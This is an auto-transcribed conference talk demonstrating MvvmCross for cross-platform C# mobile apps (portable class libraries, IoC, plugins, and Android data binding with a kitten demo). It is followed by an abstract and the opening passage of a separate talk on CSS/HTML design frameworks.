It makes the code so much more expressive. We've got iQueryable. We've got most of the network class library. We've got most of HTTP web request. And we're getting HTTP client in a moment. We've got serialization there. We've got most of the HTTP stuff, WCF. So if you've got legacy systems, you need to connect to from iPhones and androids and from Windows phones and Windows Store. That's the way through. We've got MVVM, which is quite useful for what we're doing. We've got Xlink. And also coming, because this is a growing API set, we've got async and await. So when I say coming, it's fully there across the modern Windows platforms. And it's in now for at the moment across Android. And I think it's in beta, sorry, across Android and iOS. So I'm not going to show much of that today, but it's coming. It's there. And this set is growing and people are working out how to extend it and extend it. And Microsoft are really quite committed to it now, not least because they fragmented their platforms more and more. And you know, Xbox One is going to come along as well. And it's really great to enable people to share it. So using this technique, what we were able to do is this is kind of, it's actually a Visual Studio 2010 screenshot. And this was taken, I guess, April last year. So just over, what, 14 months ago. And it enables to take Twitter search as one of our samples. And it enabled us to map it down to a really small sample like this. And in terms of refactoring, in terms of tooling, in terms of being able to merge in source control, in terms of the team being able to work on it, it's just brilliant. So there is slight problem, however, in the, as I say, Portable Class libraries give you a reduced API set. And sometimes you want a full API set. So what do you do when you need to access a, you know, something that's phone specific, like actually making a phone call? What do you do when you want to access geo location? Well, there are various techniques to this. You'll hear people talking about Hashif, my best friend in the world. You'll hear people talk about partial classes. But what we use, we use simple abstractions. We use interface driven development. And we've got a plug, sorry, interface driven development. And we've got a plug-in layer over the top of that. And that plug-in layer is simply a system of DLLs, which means that you can just insert these DLLs into your projects. And by convention, you'll get the right things. So again, can I just ask who already knows about IOC or do I need to? Okay. I'll quickly go through IOC. So IOC is really just about if you have things like an SQL engine, which is native or platform specific, if you have things like geo location, which is platform specific, and maybe you have a tax calculator, which is your own code, then you can declare interfaces on those. And you can put them in a big pot somewhere. And then when you need them, perhaps in a view model, then you just declare that you need their interfaces. And at runtime, you get the right implementation. So if you do the same thing and you do it on an iPhone, on an iPhone, you get an iPhone I SQL implementation, or an iPhone location implementation. And you get the same, perhaps, as a portable tax calculator. Then you put them into the iPhone pot. And then at runtime, you'll get the implementation you want. So let's quickly go back to Visual Studio, because I get bored of PowerPoint. And let's close this solution where we started. And let's show you a different way of building a project. 
And so what I'm going to do is let's create a new portable class library. And so we start here in Windows, and there's a portable class library. And so this is going to be called NDC kittens, which might tell some people what's coming up. You can't have a demo without kittens, zombies, gambling or sex. It's got to have something of that commitment to it. Or maybe an optocat is also available for the GitHub in the audience. So we're going to create NDC.core. And you'll get this dialogue, particularly if you modded it. And we can't support original Windows phone, but that's okay because all the Windows phones have been upgraded to Mango at least. And we hit OK, and Visual Studio goes off and implements it. And then what you can do is obviously this has got no coding at the moment. It's got this class one. We'll get rid of that. And I hope this doesn't make a loud noise. No good. So what we will do is we'll manage the new get packages, and we'll pull in, and I'm not going to use the network because it'll be too slow here. So we're going to pull in MVVM cross. And by default, when you pull in MVVM cross, then you get given an app.cs, which just tells you a little bit about how to initialize your IOC. So it's basically saying that anything ending in the word service, I'm going to put into that IOC pot, into that inversion of control. And then it also says, please, when my app starts, just show the first view model, however you do that on your platform. So what we're going to do is we're going to take a look at first view model, and it's got some default junk in there. We'll get rid of that. What we'd like to do is we'd like to do some SQL work, because that's a plugin that's going to be native on each platform. So let's go and find the SQLite plugin. So we're going to go back to new get, we'll get a local package, and there is a SQLite plugin. And we're going to install it into our portable class library. And once we've done that, then I'm going to not type this live because it would take too long, but I'm going to use a snippet. And this snippet is handily called kittens. Oops, if I could use a snippet. And what you'll see is this pulls in a first of all, it pulls in an ORM class. So it's just a, you know, data entity, which is a kitten. And each kitten has an ID, which is primary key. So if you use the databases, you'll be familiar. It's got a name, it's got a price, and it's got a kitten URL, we'll see a cute kitten. I've then got a service. So if you remember that IOC initialization code, it's going to look at that keyword of service. It's going to think that's special. I'll put that in the pot at the start up. And this is just a way for me to create random kittens so that we can have something to see at demo. And we then got this kitten Genesis service and this kitten Genesis service. Again, I'll just import the namespace. We'll generate me some random kittens and these are the top 20 kitten names on the internet. And then we've also got a data service. So this is our actual kind of repository, if you like. And I've just put some CRUD methods on the repository. So the insert, update, and delete. And then I've also put this select method, which is kittens matching. So that's the interface. And the implementation looks like this. And you'll see that the implementation in its constructor, it's going to take two things. It's going to take a SQL like connection factory. And that's something that's going to come from that SQL like plug-in. On each platform, we'll get a different one. 
And then we've got a kitten Genesis service. And that's the mock data service up above. So all it's going to do on startup is it's going to try and create the database. It's going to make sure there's a table in there for kittens. And if there aren't any kittens, then it's going to seed it with some random data for me. And if you take a look at what the, and again, I'll just pull in, that's Iquirible coming in. If we take a look at what the methods look like, then the CRUD methods are really simple. They're connection insert, connection update, and connection delete. And the select method is the lovely link-like syntax that we all love, the order buys, the wares, the to lists. So you get full, look, full intelligence in here and everything you really enjoy as a C-sharp developer. So that's our data service. Let's now use that. So back in our view model where we haven't got anything, in the constructor, I'm going to get hold of a data service. So I'll create a private member called data service. And then I'll initialize that from the constructor. And then what I'll do is, let's see, let's use kittens matching. So I'm going to create a property called filter. Yeah, and so that's called filter. And you can see the syntax there for raised property change, which I hope is what you're all used to and expecting. And then I'll create another property. And this property is going to be a list of kittens. And we'll have underscore kittens and kits. And then what I need to do is tie them together somehow. So what I'm going to do is, whenever my filter changes, then I'm going to call update. And let's also call update from the constructor so that we get something on startup. And let's also set the filter to a default value. And that can be C, because I think I saw some kittens with an aim of C. So the only thing I haven't implemented at the moment is update. And update is a pretty simple bit of C sharp, I think. So what I need is that when I'm updating, I'm going to ask my data service to for the kittens which match my filter. Yeah. And that's my core project done. Obviously, I can put a unit test on that. And when I put a unit test, I can pass in a mock data service. And that should work and should give me, you know, real reliability in my UI functionality. So I'll build that. That's built. That's my view model. I could connect a command line console app to that if I want to. But let's, how am I doing time wise? Oh, I'm talking a lot. So let's build a Android app to talk to it. So we go to Android. We go to Android application. And I call this ndckittens.core. So what I'll call the Android application is ndckittens.droid. And Android, if you, this is just the default Xamarin template. And you'll see you get, you know, an activity and you get some resources which are XML. I don't want the default activity because I want nvm cross functionality. So what we do is we go to new get again. And this time we'll pull in nvm cross, the core. And we will pull in SQLite because we want the native SQLite for Android. And this really will. It will be the C++ component that's sitting inside the Java layer and sitting inside Android. So we'll pull it in. And once we've done that, what you'll see is you'll get these default files like set up. And set up is saying please run core.app. So we're going to have to reference that core project. Let's do that. Add reference. Reference the core where the view model is. And then once we've done that, we'll just need to do our data binding. So let's do that. 
Obviously, we've got a first view generated here by default as well. And that's just going to use this XML file. So let's do our data binding. So let's go to our first view. And by default, we've kind of got this hello example. That's not so useful for us. So what do we want? We want an edit text or a text box at the top. And we're going to bind that to a filter. And then underneath, we want a list. So how are we going to do a list? So if you were doing vanilla Android, you would do a list view. And then you'd give that list view an Android ID with some horrible syntax. And then in the code behind, you would get hold of that. And then you would create another class that is called an adapter. And you would inherit from that adapter. And then you would put in the adapter some get view functionality. And then you would also put some get. Anyway, we're not going to do that. Phew. What we're going to do is we're going to add the magic letters of NVX to the front of this view, which is a class that understands data binding. And in particular, what it understands is just like in WCF and in Silverlight, it understands item source. So I hope this is big enough for everyone in the audience to see. We don't need text size anymore. We do want it to fill the parent with this particular thing. So it's a list and it's going to be big. And we want to bind the item source to the kittens. So hopefully, unless I've made a mistake, we can run this up. Let's have a go. Debug start new. Build started. It's a nervous moment for me. Did I forget anything? Coping applications. Well, it built. It built that ship. It's only fair. So it's running up. And you can see what we've got is we've got some data binding at the top where we bind this thing. And if we start typing, then there are still some kittens with C and O in there. If we go for R, there's no kittens left. Now, that's brilliant, isn't it? Except this is a little bit, yeah, that's just string. We don't really want to string on there. So we've got our RUI working to a first level. But now we need to have a data template for each list item. So if you've done as Amal, and again, apologies for those of you who haven't, I'm moving forward as quickly as I can. Then what you do is you apply a data template. So we're going to do the same thing here. And what we're going to do is we're going to have an NVX item template. And we're going to reference another XML file that's over here in the layout folder. So to do that, it's a little bit of Android syntax. It's layout slash. And then it's the name of the file we want to use. So I'm going to call this file item kitten. And the reason I use kind of these prefixes is just because Android has this horrible flat file thing. And so it's the only way of grouping them together. You can't use subfolders. So that's why I've used prefixes to try and group my resources files together. So that's it. I'm going to use item kitten. And let me just, I'll copy and paste first view. And I will create item underscore kitten. And what do we want in item kitten? So let me remove this. And what we'd like is we would like to have, let's just do a layout which is going to be horizontal. So it's a stack panel. It's going to go across the page. And let's do a image, first of all. And so this is going to be an NVX image view. And we're going to give this a fixed height, oops, NVX image view. We're going to give this a fixed height and width. 
So we're going to say this NVX image view should be, let's make it 100 dp, which is a fixed unit, and 100 dp. And obviously we'll have to terminate that. And then what we would like to do is we'd like to put the image in there. And I'll come back to that in a moment. But what we'd also like to do is we'd like to put a text view in there. And so the text view we're going to bind to the name. So let's just do the layout width is going to be filled parent and the layout height for the text view is going to be wrap content. And then let's, and again, you can use the designer for this if you prefer. Let's put the font size again, a bit larger so you can see it. So text size equals 40 dp. And let's then bind. So we're going to use local colon NVX bind. And we're going to bind the text to the name of the kitten. So that's the text view done. The remaining thing is really this image view. And what we'd like to bind on the image view is a property called image URL. And the property we'd like to bind it to is to the kitten URL on the kitten. So we do that. And let's just put that together. Now there's one more thing you have to do for Android, which is because, and like with Windows, you're used to the fact that if you just bind images, then they automatically get downloaded using the Internet Explorer cache and they get put into your application. Yeah, with Android, you don't get that. So there's another plugin we have to add just for Android. And basically we have to add the, oh, I have got that one now. Basically we have to add the download cache plugin. And the download cache plugin also relies on the file plugin in order to store these things as files. So you install those and all they've done is added some references in here. And then we should be able to run this up. And unless I've made a mistake, then we should be able to see some prettier lists on our screen. So I hope so. So there's our list. And if we start filtering, so if we start filtering down, then we remove the filter to start with. Then we get all of our kittens and these are in price order because that's the way we set up our thing. And then if we start typing and we'll just look for the pollies of the world. So if we start typing for polly, then hopefully we get pause and polly together in this list and Pepsi. And if we start PO, then we get just the pollies in the list. POL will still get them. If I misspell polly, we lose them all. So that's data binding working. There's no C-sharp code behind in the UIs. Everything's testable and that's the way our applications put together. I've overrun a bit so I won't go fully into the iOS demo to do the same thing. But what I will do is return to the slides and just show you. So this would be what the windows would look like for a list for data binding. For Android, you've just seen. You kind of use these templates. And for iOS, what you can do is you can define table view sources and it's the same sort of approach. And it allows you to bind these things together. And if you want to do custom cells, you can do it. So I'll just skip forward and show you a little bit of this movie. So if you want to do custom cells, then let me just find some custom cells in here. Then you should be able to declare them using the interface designer. So there is a designer for iOS, but it produces really not human-friendly XML file, should we say, called nibs or zips, depending on how you're feeling like saying them. And these files are not the easiest to use. 
So one of the things you'll discover is people don't use them if they want to use source control very much because they change every time you edit them. So it's very hard to do merges. It's very hard to do team efforts where you want to merge them together or to do revision history and source control. So that's what you do. And then when you put this together as an actual app, you will hopefully see something like this where you get a custom list and you'll get the kittens and the prices, et cetera. So sorry that I can't demo that live, but as I say, the Mac wouldn't connect on the network here, so I couldn't do that. Okay, so that's lists. And that's also, I hope you saw, plugins. So I hope you saw issues in the SQLite plugin. It's the same for other plugins like network plugins and messengers and camera if you want to access and take pictures. And the best thing about this plugin list is it's extensible. Yeah, so if you want to create your own plugins, it's really simple to do. You just create an interface in a core portable class library, like, you know, this is the vibration sample. There's a little bit of boilerplate code so that it'll help the conventions along to load it. And then after that, you can create platform-specific ones. So here's the vibration plugin that works on Android. And that's a native library that plugs in. The most famous example for plugins was the Spharo example I did. So this was a controller for Spharo, which is a robot which kind of glows and spins and does all sorts of things. And this was a, hopefully I won't get sound on this. This is an example we did in Evolve out in Texas. Well, we controlled seven of these from a phone. And this is cross-platform code. So this isn't your typical NVVM sample. You know, this is controlling robots using accelerometer, using speech, using all sorts of native services. But this is what we managed to put together so that, you know, you can see, hopefully, these are going to do a little dance and jig around the room and all sorts of things. So think about it as you move forward into future, you know, platforms. It's not just about static UIs on screens. It's also about speech, obviously Siri and things like that. It's also about controlling external factors and the Internet of Things. So that was the most famous example, perhaps. And that was what NVVM Cross Vnext was all about. It was all about PCLs and plugins. And NVVM Cross was really, Vnext was amazing. We really, really, really loved NVVM Cross Vnext. However, it did have a bit of a dark side. And the dark side was the getting started was described as a learning cliff that most people had to really kind of build it from source. They had to go to GitHub and download it and work out. And it also had some quite of a boast of very long class names, in fact, very, very long class names. And so we knew that we needed to evolve. And so the path that we took for, oops, I'll destroy myself. Hopefully, I've still got sound. The path that we took for our evolution is really a path from NVC, which most of you know has been around since the 70s. I seem to have heard it was invented in Norway, but I may be wrong. And it's been around since the 70s and it's model view controller. And in the middle of the 2000s along came Microsoft and John Grossman and the team inside Vista and Longhorn. And they produced NVVM, which relies on this data binder to have this view model, this model of the view. And this was middle 2000s. It hasn't really changed that much since. 
There are some notable exceptions, reactive, for example. But what we are heading towards is model view cross platform. And we're really looking at how that code can be shared and can be really empowered across multiple platforms. And it's not just about these phone platforms, it's also about the Xbox. It's also about Google Glass. It's also about TVs. It's also about the future. And the things we've added in the recent things, you've seen quite a lot of them. You've seen the clean binding. We've added Android fragments. We've added WPF. We're adding.Mac. And this is still a work in progress. We've still got a few things outstanding. But at the moment, NVVM cross V3, which is what you've kind of seen demoed, is amazing. And we really love it. And it doesn't have a dark side. And it is a work of awesomeness. There are a lot of people who built it and have contributed. And all of these people, I thank them. And I put them in every presentation to thank them. People are spotted people, they know. And it's a really huge thanks to them. And it's thanks to them that we now have samples like we've got, for example, a fractal sample. So this again is data binding. It's data binding to a mathematical model with a huge bitmap. And you're binding to this image at runtime. And generating at runtime. And this is cross platform. It's across all four of our key targets. So I can also show that running on iPhone. And it's actually very interesting to run it on a retina iPad. Because you get to see some limits of memory and some limits of calculation as you do this. So it's exactly the same code, exactly the same controls around and that UI is. And we can build that forwards. We've also got plenty of other samples. We've got things like Internet minute, which is a scary thing to watch because it tells you what's happening at the Internet in real time. So you can see all the botnet infections that are happening around us. You can see all the apps being downloaded. The email sent is just hideous to look at. And we've got other things that we can show there as well. In terms of real apps, well, obviously, Connect Star Wars was where we started. It's no longer really available because Twitter's broken the API and that, you know, there's no longer a huge need to sell that game. So I won't show you the video for Connect Star Wars. We've got things like this is a company called Bruel and Kaia from Denmark. And they are international. They are leaders in noise and vibration monitoring. And what they have is they had an installed base of Silverlight apps. So NVVM and Silverlight. And obviously Silverlight was no longer the future. And what people were asking for is can I have it on my iPad, please? Can I have it on my Android? And so they took a NVVM across version one and they ported it. So it's not just about text fields on the screen. It's also about maps. It's also about these heat bars. It's about charts. It's all data bound. It's all data bound to the same view models across three different platforms. And it's fabulous. It's by a guy called Thomas, particularly from Cheesebarron who's done this. And it gives them a testable platform for the future. There's a company called Centra Stage who do monitoring and all this thing of networks. And so they allow you to log in. And so they took their web-based system and their kind of desktop trade thing on PCs. And they plugged it in and they managed to build this iPhone app. And obviously their users were all using iPhones and they wanted them. 
And now their users are all using Android and they're porting to Android. And also they've ported the same thing to Mac desktop. So exactly the same code using Xamarin.Mac now runs on Mac desktop. We don't have this in the core framework at the moment just because we're waiting for a little bit of PCI support before we make the big effort of putting it across. But this is the future again. When a new platform comes along we can do it. And all of the things like the Sony platforms for example are all C-Sharp which is brilliant. And hopefully as well the Microsoft ones will be if they work it out. So Aviva was one of the, again a version one customer. And they've got this platform that monitors your driving and gives you a score out of ten about how safe you drive. And then we'll give you a discount depending on how safe you've driven. I presume there's an underground current where you try and score zero. I don't know. But again this because it was an insurance app and because insurers don't take any risks at all this needed to be heavily tested. It needed to work across both platforms. It had quite a lot of background code looking at geolocation and things. And so this was again another app. The final app I'll talk about is the Lions app. So this is a rugby tour. I'm not going to make the joke I made in America about rugby because I was worried about Texan shooting me. I'm not going to. I'm not going there. But so this is rugby tour. It's very rich. It's very consumer. It's kind of a magazine thing. But it's also got live stats during games. It had a competition in there. It's on Windows phone. It's on Windows 8. It's on iPhone. It's on iPad. It's on Android. It's on Android tablet. It's also on the Kindle tablets. And this was built in two months by a group of three C-Sharp engineers who didn't know mobile. Yeah, they knew ZAML. They didn't know any of the mobile platforms. And back to front, it's C-Sharp everywhere. So on the server, they use a CMS, which is Umbraco, which talks to SQL Server using entity framework. It's then got this web API front end, which is C-Sharp. It uses a PCL block of entities. Yeah, so all of the JSON objects that go across the web API, those are PCL codes. So it's shared between the server. So that's another one of our platforms, really, and the client. The core logic is also always in a PCL. And all of the UIs are in PCLs. So the SQLite on the local database is also the C-Sharp DRMs. So anywhere in there, any of the engineers can feel comfortable. It's not like, oh, that's the iOS code. I can't touch it. It is all C-Sharp. It's all refactored. It's all got IntelliSense and resharper navigation support. In terms of lines of code, and this is kind of where they, these are their genuine numbers of version one, you'll notice that actually some of the code isn't that shared. Like, there's quite a lot of UI code in the iPhone and iPad, for example. The main reason for that is because they wrote a lot of custom controls, and also they didn't want to use these Zibs, so they wrote everything in C-Sharp there. But what's important is everything they wanted to share in the PCL code they could share. Yeah, just the animations and things like that and the layouts on the individual platforms they didn't share. So that is MVVM Cross, and I'm running about right on schedule. And MVVM Cross is very much still a growing platform. Yeah, V3 is hopefully our final big revision. We have cleaned things up quite a lot. 
But MVVM Cross is still learning, and the path that we have gone along in the last year, in the last 18 months, is we started with version one, which was really about, you know, everything we do is pretty much driven by real projects. There's no point in making up requirements. We've got plenty of requirements, which are real. But it was really about supporting IE Notify property changed on the three platforms. Version two was the real requirements was to make things more maintainable and to allow us to work in bigger teams. I mean, you know, things like the insurers have very big teams of developers, and was allowed to make really testable code. So that was PCLs in version two. Version three is about cleaning it up, adding.mac. And then the future, and the future is wide open, obviously, but it's pretty darn exciting. And what we're looking at now is we're looking at, you know, as I say, MVVM itself has been fixed almost since 2005, and we're looking at other ideas. What else can we do in our view models? If you look in the JavaScript world, where Angular and where, and where things like Knockout have come along, they've done really exciting things in their view models and their bindings. Some of those things, like the computer observables, can they come back into our world? Can they come back and change things? And to some extent, we're now free of Microsoft and we're free of XAML because we've got our own binding framework. So it's a really exciting time in terms of moving forward. Obviously, async, I haven't shown you much of. I can show you a quick. So there's a guy called John Dix who has produced, do you know what Jabra is? It's a chat room or online using SignalR. And he's produced this Android app as a first demo. And at the moment, this Android app can connect and can talk to all the rooms that allows you to post messages, et cetera. And yesterday, I ported that same code across. And it's not pretty yet, but I ported the same code across just by using XAML bindings. So hopefully, this would connect. And I can join the MVVM cross room and I can type in what's up and be immortalized forever that that has been sent into the thing. Oh, there are some more messages at the bottom. So it's a very much a first UI. I'm not going to ship this one to the store. But you can see that everything is in there. And you can pull about the rooms. And all of these pages, you can pull about the rooms. Maybe you can't. And you can join another room. You can do all that. And this is async await code. This is all our modern C sharp and is the future. So it's very exciting. We also have auto views. We have the idea of some of the UIs could actually be constructed centrally, which is kind of based around dialogue. There's a lot going on around F sharp. I don't know if you've noticed this conference. There are a lot of functional programming sessions and F sharp. FOD is an AOP approach. The ninja ID you've seen, but there's also a plug in ID being built for Xamarin Studio, which is brilliant. We're looking at how we can integrate into designers more. You know, I'm kind of XML based, but I understand designers. As Guy in Holland, who's produced proto pad, which is a bit like a link pad for UIs. It's brilliant. There's more patterns we can do. And I can show you that, for example, this is a guy called Pan Homes in Tenerife, who's produced an F sharp view model and an F sharp view. So there's no reason you can't use our C sharp code in F sharp. 
And things like that fractal sample, I'd love to see how that really gets much smaller in F sharp. And much more flexible and much more tested. And then there's also, so this is the FOD. And FOD, I don't know if you can see this. Let me show you. So if you use FOD and apologies that it's out of focus doing that, then you don't have to do all of that raise, not property change stuff, because it will inject that for you afterwards. All you do is you decorate your class with implement property change, and then it'll come along and actually automatically generate it. And the amount of effort you have to go to get this working is you have to put that attribute in, and you have to pull in the package from NuGet. So that's it. And the future for things like that is also very exciting with things like the compiler from, you know, the Roslin compiler. So hopefully we've covered some of this today. Sorry if I didn't go into introductions as much as I perhaps suggested I would. And hopefully you've got a good idea about how MVVM and data binding can be applied across all the platforms from this. And that is my hope. It's a new hope. And I hope that if you face a future challenge of any description like we did with Star Wars, then I hope you can keep calm and you can write some code. And I also kind of sneakily hope that you can keep calm and use MVVM across. So thank you very much for listening today. Amazingly, I have four minutes left, which is quite unexpected. So if there are any questions, I can actually answer them, or I can demo some more code or anything else. Anyone got any questions? Oh, there are also stickers. So if anybody likes to decorate their laptops, then by all means come and grab me and grab some stickers. Can I do, sorry? So partial views, you mean kind of user controls? Yeah, so yes, you can do partial views. Oops, that's a bit of Darth Vader coming back. Yes, you can do partial views on every platform. So with iOS, you can have a UI view controller for a specific area and give that its own iNotify property changed object and it will work. Similarly, you can do it on Android using either fragments or using our own control, just called MVX Frame Control. You just give its own data context. You can change that data context and it will change and update automatically. You can use it as a dialogue if you want to. You can use it within tab views. That's the way the tabs work. So yeah, it's exactly as you expect. And you, we do have a navigation model. We allow people to use it on our navigation service. But you can also, if you want to, replace that entirely. And you can just manually set up a view and say, here's your data context and go. So for example, the list view is done on exactly that philosophy. So every cell in that list view has its own kind of data context. And the binding works two way on that as well. So there are several ways of communicating through view models. Like you can actually just give them C sharp references if you want to. There is a messenger plugin which will allow you to use the messenger pattern. And that messenger pattern uses weak references by default. So you don't have to unsubscribe. It just kind of unsubscribes itself when you get garbage collected. Or you can use any other messenger if you want to. So if you want to use something like the great tiny messenger, you can use it. So yes, that's the main way that we set up that type of messaging. And you can also use that messaging back to the UI if you want to or between services. 
That side of the architecture, I deliberately leave very open for people just because there's so many ways you can build these things. And that's to allow it open. So the way you do that is you would have to do a little bit of code behind. And I don't think I've got a sample available by pre-recorded. But basically on every platform you do have to generally override. There's two methods you have to override. One is where you first register the templates on each platform. And the other is where you choose which template you're going to use for a particular object. But there's a very nice sample, for example, which are kittens and puppies, exactly that on iOS. And also if you're using observable collection, then all of your observable collections, your iNotify collection changed, they work across all platforms. And particularly on iOS, iPhone has, you know, the table view is its heart of iPhone. Every standard control, every standard app in iPhone is a table view, is that list view. And it's wonderful when you actually add an observable collection, you get an animated slide in. It's exactly what you expect for that. When you delete something, you can animate how it fades out, for example. So yeah, that templating again is available. You do have to do a little bit of code to choose which template you're going to use. But it's there. And basically on Android, for example, it would just be another file and then two lines of, you know, switch statement, for example, in C sharp. Okay. Is that it for questions? Okay. So you can all go and have a break now. And this was a picture from Worldwide Developer Congress this week of the breaks. And it's quite funny, but it's also not funny because this is, we need to get some more people in that left thank you. And I don't mean gents move over. So if anyone's got any ideas of developer community, how we get more and more females involved, please tweet it. Please try and work out how we solve this. Because I do some, a little bit of work with young, rewired state. And young, rewired state see 50% females all the time. And some of them are up to 70%. So, you know, we're doing something wrong as a profession. Sorry. A little bit of a political bit at the end. But if you can think of any ways of improving that, I'll go and have a break. Thank you very much, guys.
|
1.4 Million new Android devices are activated every day. 500 Million iOS devices sold. You can target all of them today from your existing C# skills and code. This talk covers: - very brief introductions to Mvvm, Portable Class Libraries, MonoTouch and Mono for Android, - a walkthrough of creating an app using Mvvm and Data-Binding on MonoTouch and Mono for Android, - using native features and functionality through portable plugins, - delighting users with native UIs on all platforms
|
10.5446/51519 (DOI)
|
Good afternoon. Welcome to a developer's guide to design frameworks. If this is not the talk you were looking for, I won't judge if you want to head out. Of course, I would love it if you stayed. Welcome. Come on in. Plenty of seating. Again, developer's guide to design frameworks. My name is Tim G. Thomas. I'm the technical architect at Headspring Mobile. We are a software consultancy based out of Austin, Texas. We have, oh, man, close to 50 people, I think, now. So we're definitely growing. Focus predominantly on web software, but we'll do pretty much anything that our clients need to solve their problems. I can be found on Twitter at Timg. Thomas, and I blog at Timg.Thomas.com. I'm actually currently in the middle of a blog series about redesigning my blog from a usability perspective. And we will probably touch on some design frameworks in that blog series. So if you're interested, feel free to subscribe or follow me on Twitter so I can get my Twitter follower count up. Let's talk about design frameworks. Hopefully that's why all of you are here. This phrase means a lot of different things. So I want to start by defining what exactly a design framework is. Especially in the software, the code realm, there's a lot of arguments about frameworks versus libraries versus components and all these other things. But for the purposes of this talk, a design framework provides some CSS, some expectations on what your HTML will look like, and on, in some of the cases, some JavaScript to put in some behavior, to have some common attributes, get started quickly. Many of the ones that we will be discussing today also have responsive components, meaning that they respond to different sizes of screens. So they look fairly decent on desktop computers, tablet devices, phone devices, who knows what else, refrigerators. Now, apparently some of those have web browsers in them. So presumably some of these frameworks will respond to those screens as well. Ultimately, the goal is to not have to force developers to touch the CSS type stuff. CSS is confusing. I've been working with it for a very long time, and we have a very love-hate relationship. There are many things that I love about it, and there are many browsers that I hate. And so these design frameworks have a goal of fixing a lot of this stuff. So we'll talk about specifically what some of these things do. Again, they definitely help with rapid prototyping, whether you are planning to turn that prototype into an actual application or not. One of the things that we do commonly at Headspring is do prototyping that we have absolutely no intention of turning into production code to vet out ideas and make sure that we're not going down a completely wrong path. And we use some design frameworks to help with that. I mentioned that these sometimes preclude the necessity of dealing with CSS at a detailed level. But honestly, if you're using one, it's good to become familiar with CSS. Eventually, you'll need to do some tweaking beyond what any of these provide for you. And so a lot of these provide you the ability to become a little bit more familiar with your CSS stuff. And in some cases, maybe, there's huge asterisk that should be on that last point. Maybe they will actually turn into a final user interface for you. But we'll discuss why that's potentially not such a great idea a little bit later. So you would want to use one over maybe rolling your own stuff. We've already discussed prototyping. 
So if you're trying to do something like that, if you're writing a project for you and as developers, I think a lot of us do that, sometimes they end up becoming very public projects that everybody uses. But many of them start as things for just you. So if you're using just building an app for yourself, these design frameworks can definitely help with that. And in some of the cases, as we'll see today, you can actually build on these and put some additional styling on them. So they'll provide sort of a normalized baseline scaffolding foundation, whatever you want to call it, upon which you can add additional CSS styles and build up the visual style of your application. The question that I'm always asked at this point is, do I still need a UI designer? And I have some bad news. Yes, you really do. It's really difficult to get by in the long term without one. But as I mentioned, some of these personal projects just for you probably don't need one. But the second you start interacting with users, probably would help to actually get a legitimate UI designer. By that, I don't mean you guys are not legitimate UI designers, but someone who may do that for a living. That's all they do is work in CSS and HTML and maybe some JavaScript to make things look good, usable, all that other good stuff. But again, it's a good place to start here. You can begin here, maybe hand it off to a designer. Maybe you get so excited about working with this stuff that you want to become a designer yourself. And so you learn CSS and HTML, and then you can build on top of these things. But regardless, these are a good place to get started on almost any type of project. So I have some more bad news. And that bad news is, if you were coming here hoping that I was going to say, use this framework and no others, that's not going to happen. I do not have one go-to framework. I don't recommend that anybody have one go-to framework. This means that none of the frameworks that are on this presentation have paid me to be here, much that I wish that wasn't the case. They didn't, and I will not be telling you, you need to use this one. What I do hope to do is educate you on the options that are available, talk about the strengths and weaknesses of several categories of these design frameworks, and when they work well and when they don't work well, so that when you're encountering a circumstance where you think, maybe I could use a design framework, you're better equipped to determine which one would be good for you. On the other hand, I'm not going to do this. And this is actually a search result that I found. I just did a search for a jQuery light box plug-ins, which are those things that pop up on photo gallery sites and show you bigger pictures than were on the screen. I hate these because what they come down to is here's 50 options, here's their URLs, here's something interesting about them. Go pick one. And there's no additional information other than here's 50 of them. I don't want to do that either. So with that in mind, I'm not going to be providing a large number of examples. We'll be categorizing each of the major ones, and some of which you may not have heard of. And then using those as sort of blueprints for figuring out what some of the other options are, so that then you can go through and search for, I need a particular type of design framework and come across search results like 50 plus design frameworks you should try. But that's not me. That's for later. That's for your Google searches. 
Right now, I'm just going to be categorizing them and again trying to help educate you guys. Before I get too far in, I want to take a few moments and talk about well-formed HTML. How many of you touch HTML on a near daily basis? Show of hands. Most everybody? That's great. Awesome. That's actually exactly what I was hoping for. Of those, you don't have to necessarily raise your hand, but just like nod or something. Do you understand HTML? Do you really get it? Can you figure out when to use certain tags more or less? Okay. There's a good reason for this. There are a number of other reasons. The project I just left at my job had a large component that had to be accessed by people with disabilities and use of proper HTML tags definitely helps with a lot of that. But there are some other reasons that are specific to working with design frameworks. For one, it's very easy to apply a lot of these frameworks on top of your existing HTML if you follow some conventional rules. Not always. We'll talk about some exceptions today. But if you follow the generally accepted practices for building HTML, it will be relatively easy to apply a lot of these design frameworks. It helps with consistent styling. If you have a plan, if you know that I'm going to be representing a text box with a label next to it, so I'm going to use the paragraph tag and then the label tag and then the input tag. If you consistently use the same sorts of HTML groups, then you'll have a more consistent styling in your user interface. This goes beyond design frameworks. This is just if you do that, you will have a more consistent UI. It doesn't matter whether you're using a design framework or not. And finally, it simply lowers maintenance time and costs. Divitis is a pretty big issue that we're encountering a lot these days. And that's an overabundance of Div tags. Certain websites, I think IBM's website is really bad about this. They also, I think, use tables, by the way, for layout, also no, no. But it's confusing to use. A new developer coming in has to sift through all of these Div tags, especially if they're using one of the Dev tools that one of the browsers provides, to try to figure out where they need to start implementing this new feature or this new design or something. And so clean, well-formed HTML helps quite a bit with that. If you need some help on this, on this front, there's an excellent site by the What Working Group, which has been responsible for a lot of the interesting conversations going around HTML5. They have a site developers.whatwg.org. And there's some sections there that discuss specifically HTML tags, even existing ones before HTML5, when to use them, how they can best be integrated with other tags and so forth. So worth checking out if you haven't already. So while we're evaluating these different design frameworks today, we'll be scoring them on four important metrics, utility efficiency, education, and extensibility. And I want to take a brief moment to describe what I mean exactly by each of these. Utility is how close a framework is to the end-all, be-all, do absolutely everything for you. So a framework with a high utility score has all of the CSS that you will ever need, all of the JavaScript that you will ever need to build a final-looking UI. Efficiency is how long does it take to start being really productive with it? Do you have to read a lot of documentation, or can you just simply jump in and start using it? Education is how easy is it to learn from this framework? 
